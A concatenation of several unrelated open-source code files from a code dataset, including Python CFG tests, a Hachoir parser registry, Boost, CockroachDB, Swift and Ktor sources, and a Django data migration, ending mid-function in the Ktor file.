('(a > 3)', 'b += 1', 'range(0, a)'),
('range(0, a)', 'return a', None),
('break', 'a = 2', '(a > 0)'),
('(a > 0)', 'range(1, a)', ('return b', 'a = 3')),
('range(1, a)', 'return b', None),
('range(1, a)', 'a = 3', None),
),
)
self.assertStatementEdges(
graph,
(
('b = 0', 'While:3', 'range(1, a)'),
('(a > 0)', 'For:4', 'a = 2'),
('range(0, a)', 'If:5', ('(a > 3)', 'a = 2')),
('(a > 2)', 'If:7', ('b += 1', 'a = 2', 'range(0, a)')),
('(a > 3)', 'If:8', ('a = 2', 'range(0, a)')),
('(a > 0)', 'For:17', 'a = 3'),
),
)
def test_finally_straightline(self):
def test_fn(a):
try:
a += 1
finally:
a = 2
a = 3
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a += 1', 'a = 2'),
('a += 1', 'a = 2', 'a = 3'),
('a = 2', 'a = 3', None),
),
)
def test_return_finally(self):
def test_fn(a):
try:
return a
finally:
a = 1
a = 2
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'return a', 'a = 1'),
('return a', 'a = 1', None),
(None, 'a = 2', None),
),
)
def test_break_finally(self):
def test_fn(a):
while a > 0:
try:
break
finally:
a = 1
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', '(a > 0)', 'break'),
('(a > 0)', 'break', 'a = 1'),
('break', 'a = 1', None),
),
)
def test_continue_finally(self):
def test_fn(a):
while a > 0:
try:
continue
finally:
a = 1
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
(('a', 'a = 1'), '(a > 0)', 'continue'),
('(a > 0)', 'continue', 'a = 1'),
('continue', 'a = 1', '(a > 0)'),
),
)
def test_with_straightline(self):
def test_fn(a):
with max(a) as b:
a = 0
return b
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'max(a)', 'a = 0'),
('max(a)', 'a = 0', 'return b'),
('a = 0', 'return b', None),
),
)
def test_lambda_basic(self):
def test_fn(a):
a = lambda b: a + b
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = lambda b: a + b', 'return a'),
('a = lambda b: a + b', 'return a', None),
),
)
def test_pass(self):
def test_fn(a): # pylint:disable=unused-argument
pass
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'pass', None),
),
)
def test_try_finally(self):
def test_fn(a):
try:
a = 1
finally:
a = 2
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', 'a = 2'),
('a = 1', 'a = 2', 'return a'),
('a = 2', 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
),
)
def test_try_except_single_bare(self):
def test_fn(a):
try:
a = 1
a = 2
except: # pylint:disable=bare-except
a = 3
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', 'a = 2'),
('a = 2', 'a = 3', 'return a'),
(('a = 2', 'a = 3'), 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 2', 'ExceptHandler:5', 'return a'),
),
)
def test_try_except_single(self):
def test_fn(a):
try:
a = 1
a = 2
except Exception1: # pylint:disable=undefined-variable
a = 3
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', 'a = 2'),
('a = 2', 'a = 3', 'return a'),
(('a = 2', 'a = 3'), 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 2', 'ExceptHandler:5', 'return a'),
),
)
def test_try_except_single_aliased(self):
def test_fn(a):
try:
a = 1
except Exception1 as e: # pylint:disable=undefined-variable,unused-variable
a = 2
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', ('a = 2', 'return a')),
(('a = 1', 'a = 2'), 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 1', 'ExceptHandler:4', 'return a'),
),
)
def test_try_except_single_tuple_aliased(self):
def test_fn(a):
try:
a = 1
except (Exception1, Exception2) as e: # pylint:disable=undefined-variable,unused-variable
a = 2
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', ('a = 2', 'return a')),
(('a = 1', 'a = 2'), 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 1', 'ExceptHandler:4', 'return a'),
),
)
def test_try_except_multiple(self):
def test_fn(a):
try:
a = 1
except Exception1: # pylint:disable=undefined-variable
a = 2
except Exception2: # pylint:disable=undefined-variable
a = 3
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', ('a = 2', 'a = 3', 'return a')),
(('a = 1', 'a = 2', 'a = 3'), 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 1', 'ExceptHandler:4', 'return a'),
('a = 1', 'ExceptHandler:6', 'return a'),
),
)
def test_try_except_finally(self):
def test_fn(a):
try:
a = 1
except Exception1: # pylint:disable=undefined-variable
a = 2
except Exception2: # pylint:disable=undefined-variable
a = 3
finally:
a = 4
return a
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'a = 1', ('a = 2', 'a = 3', 'a = 4')),
(('a = 1', 'a = 2', 'a = 3'), 'a = 4', 'return a'),
('a = 4', 'return a', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'return a'),
('a = 1', 'ExceptHandler:4', 'a = 4'),
('a = 1', 'ExceptHandler:6', 'a = 4'),
),
)
def test_try_in_if(self):
def test_fn(a):
try:
if a > 0:
a = 1
else:
a = 2
except Exception1: # pylint:disable=undefined-variable
a = 3
a = 4
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', '(a > 0)', ('a = 1', 'a = 2')),
('(a > 0)', 'a = 1', ('a = 3', 'a = 4')),
('(a > 0)', 'a = 2', ('a = 3', 'a = 4')),
(('a = 1', 'a = 2'), 'a = 3', 'a = 4'),
(('a = 1', 'a = 2', 'a = 3'), 'a = 4', None),
),
)
self.assertStatementEdges(
graph,
(
('a', 'Try:2', 'a = 4'),
('a', 'If:3', ('a = 3', 'a = 4')),
(('a = 1', 'a = 2'), 'ExceptHandler:7', 'a = 4'),
),
)
def test_try_in_if_all_branches_exit(self):
def test_fn(a, b):
try:
if a > 0:
raise b
else:
return 0
except b:
return 1
graph, = self._build_cfg(test_fn).values()
# TODO(mdan): raise and return should have an edge to the except blocks.
self.assertGraphMatches(
graph,
(
('a, b', '(a > 0)', ('raise b', 'return 0')),
('(a > 0)', 'raise b', None),
('(a > 0)', 'return 0', None),
(None, 'return 1', None),
),
)
self.assertStatementEdges(
graph,
(
('a, b', 'Try:2', None),
('a, b', 'If:3', None),
(None, 'ExceptHandler:7', None),
),
)
def test_list_comprehension(self):
def test_fn(a):
c = [b for b in a]
return c
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a', 'c = [b for b in a]', 'return c'),
('c = [b for b in a]', 'return c', None),
),
)
def test_class_definition_empty(self):
def test_fn(a, b):
class C(a(b)):
pass
return C
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a, b', 'class C', 'return C'),
('class C', 'return C', None),
),
)
def test_class_definition_with_members(self):
def test_fn(a, b):
class C(a(b)):
d = 1
return C
graph, = self._build_cfg(test_fn).values()
self.assertGraphMatches(
graph,
(
('a, b', 'class C', 'return C'),
('class C', 'return C', None),
),
)
if __name__ == '__main__':
test.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
import re
import types
from lib.hachoir_core.error import error
from lib.hachoir_core.i18n import _
from lib.hachoir_parser import Parser, HachoirParser
import sys
### Parser list ################################################################
class ParserList(object):
    """Registry of Hachoir parser classes.

    Parsers are validated on registration and indexed in `bytag` by their
    "id" and "category" tags for O(1) lookup.
    """
    VALID_CATEGORY = ("archive", "audio", "container", "file_system",
        "game", "image", "misc", "program", "video")
    ID_REGEX = re.compile("^[a-z0-9][a-z0-9_]{2,}$")

    def __init__(self):
        self.parser_list = []
        self.bytag = { "id": {}, "category": {} }

    def translate(self, name, value):
        """Validate and normalize one (name, value) parser tag.

        Returns True when the tag should be ignored, an error string when
        the tag is invalid, or a normalized (name, value_tuple) pair.
        """
        if name in ("magic",):
            return True
        elif name == "min_size":
            # A strictly positive minimum size is required.
            return - value < 0 or "Invalid minimum size (min_size)"
        elif name == "description":
            return isinstance(value, (str, unicode)) and bool(value) or "Invalid description"
        elif name == "category":
            if value not in self.VALID_CATEGORY:
                return "Invalid category: %r" % value
        elif name == "id":
            if type(value) is not str or not self.ID_REGEX.match(value):
                return "Invalid identifier: %r" % value
            parser = self.bytag[name].get(value)
            if parser:
                return "Duplicate parser id: %s already used by %s" % \
                    (value, parser[0].__name__)
        # TODO: lists should be forbidden
        if isinstance(value, list):
            value = tuple(value)
        elif not isinstance(value, tuple):
            value = value,
        return name, value

    def validParser(self, parser, tags):
        """Return an error string when `tags` are invalid, else ""."""
        if "id" not in tags:
            return "No identifier"
        if "description" not in tags:
            return "No description"
        # TODO: Allow simple strings for file_ext/mime ?
        # (see also HachoirParser.createFilenameSuffix)
        file_ext = tags.get("file_ext", ())
        if not isinstance(file_ext, (tuple, list)):
            return "File extension is not a tuple or list"
        mimes = tags.get("mime", ())
        if not isinstance(mimes, tuple):
            return "MIME type is not a tuple"
        for mime in mimes:
            if not isinstance(mime, unicode):
                return "MIME type %r is not an unicode string" % mime
        return ""

    def add(self, parser):
        """Validate `parser` and register it; log and skip it on error."""
        tags = parser.getParserTags()
        err = self.validParser(parser, tags)
        if err:
            error("Skip parser %s: %s" % (parser.__name__, err))
            return
        _tags = []
        for tag in tags.iteritems():
            tag = self.translate(*tag)
            if isinstance(tag, tuple):
                _tags.append(tag)
            elif tag is not True:
                error("[%s] %s" % (parser.__name__, tag))
                return
        self.parser_list.append(parser)
        for name, values in _tags:
            byname = self.bytag.setdefault(name,{})
            for value in values:
                byname.setdefault(value,[]).append(parser)

    def __iter__(self):
        return iter(self.parser_list)

    def print_(self, title=None, out=None, verbose=False, format="one-line"):
        """Display a list of parser with its title
         * out: output file
         * title : title of the list to display
         * format: "rest", "trac", "file-ext", "mime" or "one_line" (default)
        """
        if format == "one-line":
            # Bug fix: the default argument is spelled "one-line" but every
            # comparison below uses "one_line", so the documented default
            # format was never actually selected. Accept both spellings.
            format = "one_line"
        if out is None:
            out = sys.stdout
        if format in ("file-ext", "mime"):
            # Create file extension set
            extensions = set()
            for parser in self:
                file_ext = parser.getParserTags().get(format, ())
                file_ext = list(file_ext)
                try:
                    file_ext.remove("")
                except ValueError:
                    pass
                extensions |= set(file_ext)
            # Remove empty extension
            extensions -= set(('',))
            # Convert to list and sort by ASCII order
            extensions = list(extensions)
            extensions.sort()
            # Print list
            text = ", ".join( str(item) for item in extensions )
            if format == "file-ext":
                print >>out, "File extensions: %s." % text
                print >>out
                print >>out, "Total: %s file extensions." % len(extensions)
            else:
                print >>out, "MIME types: %s." % text
                print >>out
                print >>out, "Total: %s MIME types." % len(extensions)
            return
        if format == "trac":
            print >>out, "== List of parsers =="
            print >>out
            print >>out, "Total: %s parsers" % len(self.parser_list)
            print >>out
        elif format == "one_line":
            if title:
                print >>out, title
            else:
                print >>out, _("List of Hachoir parsers.")
            print >>out
        # Create parser list sorted by module
        bycategory = self.bytag["category"]
        for category in sorted(bycategory.iterkeys()):
            if format == "one_line":
                parser_list = [ parser.PARSER_TAGS["id"] for parser in bycategory[category] ]
                parser_list.sort()
                print >>out, "- %s: %s" % (category.title(), ", ".join(parser_list))
            else:
                if format == "rest":
                    print >>out, category.replace("_", " ").title()
                    print >>out, "-" * len(category)
                    print >>out
                elif format == "trac":
                    print >>out, "=== %s ===" % category.replace("_", " ").title()
                    print >>out
                else:
                    print >>out, "[%s]" % category
                parser_list = sorted(bycategory[category],
                    key=lambda parser: parser.PARSER_TAGS["id"])
                if format == "rest":
                    for parser in parser_list:
                        tags = parser.getParserTags()
                        print >>out, "* %s: %s" % (tags["id"], tags["description"])
                elif format == "trac":
                    for parser in parser_list:
                        tags = parser.getParserTags()
                        desc = tags["description"]
                        desc = re.sub(r"([A-Z][a-z]+[A-Z][^ ]+)", r"!\1", desc)
                        print >>out, " * %s: %s" % (tags["id"], desc)
                else:
                    for parser in parser_list:
                        parser.print_(out, verbose)
                print >>out
        if format != "trac":
            print >>out, "Total: %s parsers" % len(self.parser_list)
class HachoirParserList(ParserList):
    # Process-wide singleton instance, created lazily by getInstance().
    _instance = None

    @classmethod
    def getInstance(cls):
        """Return the shared parser list, creating it on first use."""
        if cls._instance is None:
            cls._instance = cls()
        return cls._instance

    def __init__(self):
        ParserList.__init__(self)
        self._load()

    def _load(self):
        """
        Load all parsers from "hachoir.parser" module.
        Return the list of loaded parsers.
        """
        # Parser list is already loaded?
        if self.parser_list:
            return self.parser_list
        todo = []
        from lib import hachoir_parser
        module = hachoir_parser
        # First collect every submodule exposed by the hachoir_parser package.
        for attrname in dir(module):
            attr = getattr(module, attrname)
            if isinstance(attr, types.ModuleType):
                todo.append(attr)
        # Then register every concrete HachoirParser subclass found in those
        # submodules, skipping the abstract base classes themselves.
        for module in todo:
            for name in dir(module):
                attr = getattr(module, name)
                if isinstance(attr, type) \
                and issubclass(attr, HachoirParser) \
                and attr not in (Parser, HachoirParser):
                    self.add(attr)
        assert 1 <= len(self.parser_list)
        return self.parser_list
|
unknown
|
codeparrot/codeparrot-clean
| ||
// Copyright 2022 Peter Dimov.
// Distributed under the Boost Software License, Version 1.0.
// https://www.boost.org/LICENSE_1_0.txt
#ifndef BOOST_HASH_IS_DESCRIBED_CLASS_HPP_INCLUDED
#define BOOST_HASH_IS_DESCRIBED_CLASS_HPP_INCLUDED
#include <boost/describe/bases.hpp>
#include <boost/describe/members.hpp>
#include <type_traits>
namespace boost
{
namespace container_hash
{
#if defined(BOOST_DESCRIBE_CXX11)

// Trait: true when T is a non-union type for which Boost.Describe provides
// full metadata (both its bases and its members are described).
template<class T> struct is_described_class: std::integral_constant<bool,
    describe::has_describe_bases<T>::value &&
    describe::has_describe_members<T>::value &&
    !std::is_union<T>::value>
{
};

#else

// Without C++11 Boost.Describe support, no type can be a described class.
template<class T> struct is_described_class: std::false_type
{
};

#endif
} // namespace container_hash
} // namespace boost
#endif // #ifndef BOOST_HASH_IS_DESCRIBED_CLASS_HPP_INCLUDED
|
unknown
|
github
|
https://github.com/mysql/mysql-server
|
extra/boost/boost_1_87_0/boost/container_hash/is_described_class.hpp
|
// Copyright 2021 The Cockroach Authors.
//
// Use of this software is governed by the CockroachDB Software License
// included in the /LICENSE file.
package roachprod
import (
"context"
"github.com/cockroachdb/cockroach/pkg/roachprod/install"
"github.com/cockroachdb/cockroach/pkg/roachprod/logger"
)
// StartServiceForVirtualCluster starts SQL/HTTP instances for a
// virtual cluster. If the `startOpts` indicate that the service is
// external, this will create processes on an underlying
// roachprod-created cluster of VMs. The SQL/HTTP instances connect to
// a storage cluster, which must be running already.
func StartServiceForVirtualCluster(
	ctx context.Context,
	l *logger.Logger,
	storageCluster string,
	startOpts install.StartOpts,
	clusterSettingsOpts ...install.ClusterSettingOption,
) error {
	// TODO(radu): do we need separate clusterSettingsOpts for the storage cluster?
	sc, err := newCluster(l, storageCluster, clusterSettingsOpts...)
	if err != nil {
		return err
	}
	startOpts.StorageCluster = sc
	// If we are starting a service in shared process mode, `Start` is
	// called on the storage cluster itself.
	startCluster := sc
	// NOTE(review): install.StartServiceForVirtualCluster is assumed to be
	// the StartTarget constant selecting external-process mode — confirm
	// against the install package's StartTarget definitions.
	if startOpts.Target == install.StartServiceForVirtualCluster {
		l.Printf("Starting SQL/HTTP instances for the virtual cluster")
		// If we are starting a service in external process mode, `Start`
		// is called on the nodes where the SQL server processed should be
		// created.
		ec, err := newCluster(l, startOpts.VirtualClusterLocation, clusterSettingsOpts...)
		if err != nil {
			return err
		}
		startCluster = ec
	}
	return startCluster.Start(ctx, l, startOpts)
}
// StopServiceForVirtualCluster stops SQL instance processes on the virtualCluster given.
func StopServiceForVirtualCluster(
	ctx context.Context,
	l *logger.Logger,
	clusterName string,
	secure install.SecureOption,
	stopOpts StopOpts,
) error {
	c, err := newCluster(l, clusterName, secure)
	if err != nil {
		return err
	}
	// The label restricts Stop to the processes belonging to this virtual
	// cluster (and, when set, the specific SQL instance) on each node.
	label := install.VirtualClusterLabel(stopOpts.VirtualClusterName, stopOpts.SQLInstance)
	return c.Stop(ctx, l, stopOpts.Sig, stopOpts.Wait, stopOpts.GracePeriod, label)
}
|
go
|
github
|
https://github.com/cockroachdb/cockroach
|
pkg/roachprod/multitenant.go
|
//===--- ModuleNameLookup.h - Name lookup within a module -------*- C++ -*-===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
//
// This file defines interfaces for performing top-level name lookup into a
// set of imported modules.
//
//===----------------------------------------------------------------------===//
#ifndef SWIFT_AST_MODULE_NAME_LOOKUP_H
#define SWIFT_AST_MODULE_NAME_LOOKUP_H
#include "llvm/ADT/SmallVector.h"
#include "swift/AST/Identifier.h"
#include "swift/AST/Module.h"
#include "swift/Basic/SourceLoc.h"
namespace swift {
class ValueDecl;
namespace namelookup {
/// How the results of a module-level name lookup are to be filtered.
enum class ResolutionKind {
  /// Lookup can match any number of decls, as long as they are all
  /// overloadable.
  ///
  /// If non-overloadable decls are returned, this indicates ambiguous lookup.
  Overloadable,

  /// Lookup should match a single decl that declares a type.
  TypesOnly,

  /// Lookup should only match macros.
  MacrosOnly,
};

/// Writes a textual representation of \p kind to \p out (presumably for
/// debugging / request-evaluator display — confirm at the call sites).
void simple_display(llvm::raw_ostream &out, ResolutionKind kind);
/// Performs a lookup into the given module and its imports.
///
/// If 'moduleOrFile' is a ModuleDecl, we search the module and its
/// public imports. If 'moduleOrFile' is a SourceFile, we search the
/// file's parent module, the module's public imports, and the source
/// file's private imports.
///
/// \param moduleOrFile The module or file unit to search, including imports.
/// \param name The name to look up.
/// \param hasModuleSelector Whether \p name was originally qualified by a
/// module selector. This information is threaded through to underlying
/// lookup calls; the callee is responsible for actually applying the
/// module selector.
/// \param[out] decls Any found decls will be added to this vector.
/// \param lookupKind Whether this lookup is qualified or unqualified.
/// \param resolutionKind What sort of decl is expected.
/// \param moduleScopeContext The top-level context from which the lookup is
/// being performed, for checking access. This must be either a
/// FileUnit or a Module.
/// \param loc Source location of the lookup. Used to add contextual options,
/// such as disabling macro expansions inside macro arguments.
/// \param options name lookup options. Currently only used to communicate the
/// NL_IncludeUsableFromInline option.
void lookupInModule(const DeclContext *moduleOrFile,
DeclName name,
bool hasModuleSelector,
SmallVectorImpl<ValueDecl *> &decls,
NLKind lookupKind,
ResolutionKind resolutionKind,
const DeclContext *moduleScopeContext,
SourceLoc loc, NLOptions options);
/// Performs a qualified lookup into the given module and, if necessary, its
/// reexports, observing proper shadowing rules.
///
/// \param moduleOrFile The module or file unit to search, including imports.
/// \param accessPath Access path of the import through which the module is
/// visible; presumably used to restrict which decls match — confirm at
/// call sites.
/// \param[out] decls Any found decls will be added to this vector.
/// \param lookupKind Whether this lookup is qualified or unqualified.
/// \param resolutionKind What sort of decl is expected.
/// \param moduleScopeContext The top-level context from which the lookup is
/// being performed, for checking access. This must be either a
/// FileUnit or a Module.
void
lookupVisibleDeclsInModule(const DeclContext *moduleOrFile,
                           ImportPath::Access accessPath,
                           SmallVectorImpl<ValueDecl *> &decls,
                           NLKind lookupKind,
                           ResolutionKind resolutionKind,
                           const DeclContext *moduleScopeContext);
} // end namespace namelookup
} // end namespace swift
#endif
|
c
|
github
|
https://github.com/apple/swift
|
include/swift/AST/ModuleNameLookup.h
|
from unittest import TestCase
import numpy as np
from hrv.filters import moving_average, moving_median, quotient, threshold_filter
from hrv.rri import RRi
class Filter(TestCase):
    """Tests for the RRi series filters (moving window, quotient, threshold)."""

    def _check_values(self, filtered, expected_values):
        # Shared check: every filter must hand back an RRi whose values
        # match the expectation to 2 decimal places.
        assert isinstance(filtered, RRi)
        np.testing.assert_almost_equal(filtered.values, expected_values, decimal=2)

    def test_moving_average_order_3(self):
        source = np.array([810, 830, 860, 790, 804])
        self._check_values(moving_average(source, order=3),
                           [810, 833.33, 826.66, 818, 804])

    def test_moving_average_order_5(self):
        source = np.array([810, 830, 860, 790, 804, 801, 800])
        self._check_values(moving_average(source, order=5),
                           [810, 830, 818.79, 817.0, 811.0, 801, 800])

    def test_moving_median_oder_3(self):
        source = np.array([810, 830, 860, 790, 804])
        self._check_values(moving_median(source, order=3),
                           [810, 830.0, 830.0, 804, 804])

    def test_moving_median_order_5(self):
        source = np.array([810, 830, 860, 790, 804, 801, 800])
        self._check_values(moving_median(source, order=5),
                           [810, 830, 810.0, 804.0, 801.0, 801, 800])

    def test_quotient_filter(self):
        self._check_values(quotient([810, 580, 805, 790]), [805, 790])

    def test_quotient_filter_receiving_and_return_rri_class(self):
        filtered = quotient(RRi([810, 580, 805, 790]))
        wanted = RRi(rri=[805, 790], time=[1.385, 2.175])
        self._check_values(filtered, wanted.values)
        np.testing.assert_almost_equal(filtered.time, wanted.time, decimal=2)

    def test_movinng_filters_receiving_and_return_rri_class(self):
        source = RRi([810, 830, 860, 790, 804, 801, 800], time=[0, 1, 2, 3, 4, 5, 6])
        filtered = moving_median(source)
        self._check_values(filtered, [810, 830, 830, 804, 801, 801, 800])
        np.testing.assert_almost_equal(filtered.time, [0, 1, 2, 3, 4, 5, 6], decimal=2)

    def test_threshold_filter(self):
        source = RRi([810, 830, 860, 865, 804, 1100, 800], time=[0, 1, 2, 3, 4, 5, 6])
        filtered = threshold_filter(source, threshold=250)
        self._check_values(filtered, [810, 830, 860, 865, 804, 748.40625, 800])
        np.testing.assert_almost_equal(filtered.time, [0, 1, 2, 3, 4, 5, 6], decimal=2)

    def test_threshold_filter_noise_in_the_beginning(self):
        source = RRi([810, 500, 860, 865, 804, 810, 800], time=[0, 1, 2, 3, 4, 5, 6])
        filtered = threshold_filter(source, threshold=250)
        self._check_values(filtered, [810, 814.34375, 860, 865, 804, 810, 800])
        np.testing.assert_almost_equal(filtered.time, [0, 1, 2, 3, 4, 5, 6], decimal=2)

    def test_threshold_filter_string_threshold(self):
        source = RRi([810, 650, 860, 865, 804, 810, 800], time=[0, 1, 2, 3, 4, 5, 6])
        filtered = threshold_filter(source, threshold="strong")
        self._check_values(filtered, [810, 814.34375, 860, 865, 804, 810, 800])
        np.testing.assert_almost_equal(filtered.time, [0, 1, 2, 3, 4, 5, 6], decimal=2)
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
import os
from django.db import migrations, models
def create_course(Commander, Course, data):
    """Ensure the Commander and Course described by one JSON record exist.

    Returns the (possibly pre-existing) Course matched by title; all other
    Course fields are only used as defaults on first creation.
    """
    commander, _created = Commander.objects.get_or_create(
        name=data['created_by']
    )
    course_defaults = {
        'system': data['system'],
        'course_type': data['course_type'],
        'nearby_outfitting': data['nearby_outfitting'],
        'distance_from_primary': data['distance_from_primary'],
        'distance_from_sol': data['distance_from_sol'],
        'notes': data['notes'],
        'created_by': commander,
    }
    course, _created = Course.objects.get_or_create(
        title=data['title'],
        defaults=course_defaults,
    )
    return course
def create_initial_courses(apps, schema_editor):
    """Data migration: load the bundled JSON fixtures and create one Course
    plus its type-specific detail record for every entry.

    Each fixture maps to a (detail model, course_info key list) pair; the
    detail fields are copied verbatim from each record's 'course_info'
    mapping. Behavior is identical to the original hand-unrolled version.
    """
    Commander = apps.get_model("cmdrs", "Commander")
    Course = apps.get_model("courses", "Course")

    # Fixture file name -> (detail model, course_info keys copied into it).
    fixtures = [
        ('zero_gravity.json', apps.get_model("courses", "ZeroGravityCourse"),
         ('vehicle_type', 'station_name', 'number_of_rings', 'length')),
        ('surface.json', apps.get_model("courses", "SurfaceCourse"),
         ('vehicle_type', 'planet_name', 'coordinates', 'gravity')),
        ('srvrally.json', apps.get_model("courses", "SRVRallyCourse"),
         ('vehicle_type', 'planet_name', 'length', 'start_port_name',
          'end_port_name', 'starting_line', 'finish_line', 'gravity',
          'planet_type')),
        ('srvcross.json', apps.get_model("courses", "SRVCrossCourse"),
         ('vehicle_type', 'planet_name', 'port_name', 'gravity',
          'tidally_locked')),
        ('stadium.json', apps.get_model("courses", "StadiumCourse"),
         ('vehicle_type', 'planet_name', 'port_name', 'gravity')),
    ]

    data_dir = os.path.join(
        os.path.dirname(os.path.dirname(__file__)),
        'data'
    )
    for filename, detail_model, info_fields in fixtures:
        _load_courses_from_file(
            os.path.join(data_dir, filename),
            Commander, Course, detail_model, info_fields,
        )


def _load_courses_from_file(path, Commander, Course, detail_model, info_fields):
    """Create Course rows plus *detail_model* rows from one JSON fixture file."""
    with open(path) as fixture:
        records = json.load(fixture)
    for data in records:
        course = create_course(Commander, Course, data)
        info = data['course_info']
        # get_or_create keyed on course: re-running the migration does not
        # duplicate detail rows (same semantics as the original).
        detail_model.objects.get_or_create(
            course=course,
            defaults={field: info[field] for field in info_fields},
        )
class Migration(migrations.Migration):
    # Data migration: seeds the initial Course rows from the bundled JSON
    # fixtures once both apps' initial schemas exist.

    dependencies = [
        ('cmdrs', '0001_initial'),
        ('courses', '0001_initial'),
    ]

    operations = [
        # NOTE(review): no reverse function is supplied, so this migration
        # is irreversible as written.
        migrations.RunPython(create_initial_courses),
    ]
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Copyright 2014-2022 JetBrains s.r.o and contributors. Use of this source code is governed by the Apache 2.0 license.
*/
package io.ktor.client.engine.winhttp.internal
import io.ktor.client.network.sockets.*
import kotlinx.cinterop.*
import platform.windows.*
import platform.winhttp.ERROR_WINHTTP_TIMEOUT
// Handle to the already-loaded winhttp.dll module, used to resolve
// WinHTTP-specific error strings via FormatMessageW. Resolved lazily on
// first error.
@OptIn(ExperimentalForeignApi::class)
private val winHttpModuleHandle by lazy {
    GetModuleHandleW("winhttp.dll")
}

// Neutral language / default sub-language, i.e.
// MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT).
@OptIn(ExperimentalForeignApi::class)
private val languageId = makeLanguageId(LANG_NEUTRAL.convert(), SUBLANG_DEFAULT.convert())

// Win32 ERROR_INSUFFICIENT_BUFFER converted to UInt once so comparisons
// against GetLastError() need no per-call conversion.
@OptIn(ExperimentalForeignApi::class)
private val ERROR_INSUFFICIENT_BUFFER: UInt = platform.windows.ERROR_INSUFFICIENT_BUFFER.convert()
/**
 * Builds an exception describing the most recent WinAPI failure, as
 * reported by GetLastError().
 */
internal fun getWinHttpException(message: String): Exception =
    getWinHttpException(message, GetLastError())
/**
 * Builds an exception for the given WinAPI error code.
 *
 * The message combines the caller-supplied context, the system error text
 * (with any trailing period removed) and both the raw code and its HRESULT
 * form. A WinHTTP timeout maps to [ConnectTimeoutException]; every other
 * code becomes an [IllegalStateException].
 */
internal fun getWinHttpException(message: String, errorCode: UInt): Exception {
    val hResult = getHResultFromWin32Error(errorCode)
    val description = getErrorMessage(errorCode).trimEnd('.')
    val detail = "$message: $description. Error $errorCode (0x${hResult.toString(16)})"
    val isTimeout = errorCode.toInt() == ERROR_WINHTTP_TIMEOUT
    return when {
        isTimeout -> ConnectTimeoutException(detail)
        else -> IllegalStateException(detail)
    }
}
/**
 * Resolves a WinAPI error code to human-readable text, preferring the
 * WinHTTP-specific message table over the generic system one.
 */
@OptIn(ExperimentalForeignApi::class)
internal fun getErrorMessage(errorCode: UInt): String {
    val fromWinHttp = formatMessage(errorCode, winHttpModuleHandle)
    if (fromWinHttp != null) {
        return fromWinHttp
    }
    return formatMessage(errorCode) ?: "Unknown error"
}
/**
 * Formats error code into human readable error message.
 *
 * First attempts to render the message into a fixed 256-code-unit stack
 * buffer; if the system reports ERROR_INSUFFICIENT_BUFFER, retries with
 * FORMAT_MESSAGE_ALLOCATE_BUFFER and releases the system-allocated buffer
 * with LocalFree afterwards.
 *
 * @param errorCode is error code.
 * @param moduleHandle is DLL handle to look for message; when null, the
 * system message table is searched instead.
 * @return the formatted message, or null if none could be produced.
 */
@OptIn(ExperimentalForeignApi::class)
private fun formatMessage(errorCode: UInt, moduleHandle: HMODULE? = null): String? = memScoped {
    val formatSourceFlag = if (moduleHandle != null) {
        FORMAT_MESSAGE_FROM_HMODULE
    } else {
        FORMAT_MESSAGE_FROM_SYSTEM
    }
    // Try reading error message into allocated buffer
    var formatFlags = FORMAT_MESSAGE_IGNORE_INSERTS or FORMAT_MESSAGE_ARGUMENT_ARRAY or formatSourceFlag
    val bufferSize = 256
    val buffer = allocArray<UShortVar>(bufferSize)
    var readChars = FormatMessageW(
        formatFlags.convert(),
        moduleHandle,
        errorCode,
        languageId,
        buffer.reinterpret(),
        bufferSize.convert(),
        null
    )
    // Read message from buffer
    if (readChars > 0u) {
        return@memScoped buffer.toKStringFromUtf16(readChars.convert())
    }
    // Any failure other than "buffer too small" is unrecoverable here.
    if (GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
        return@memScoped null
    }
    // If the allocated buffer is too small, try to request buffer allocation
    formatFlags = formatFlags or FORMAT_MESSAGE_ALLOCATE_BUFFER
    val bufferPtr = alloc<CPointerVar<UShortVar>>()
    readChars = FormatMessageW(
        formatFlags.convert(),
        moduleHandle,
